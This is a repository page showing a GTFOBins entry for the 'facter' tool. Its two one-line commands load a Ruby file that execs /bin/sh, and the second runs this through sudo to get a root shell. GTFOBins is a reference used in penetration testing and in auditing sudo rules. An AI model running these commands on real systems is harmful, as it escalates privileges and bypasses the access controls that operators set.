This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
31af1e879fcccd8b0587ccf8cfda1aae9bda9341
GTFOBins.github.io
/
_gtfobins
/
facter.md
Andrea Cardaci
9aa7ec842e
Use the sudo VAR=... syntax instead of using -E
2020-06-10 22:56:05 +02:00
259 B
Raw
Blame
History
functions
functions
shell
sudo
code
TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb FACTERLIB=$TF facter
code
TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb sudo FACTERLIB=$TF facter
Reference in New Issue
View Git Blame
Copy Permalink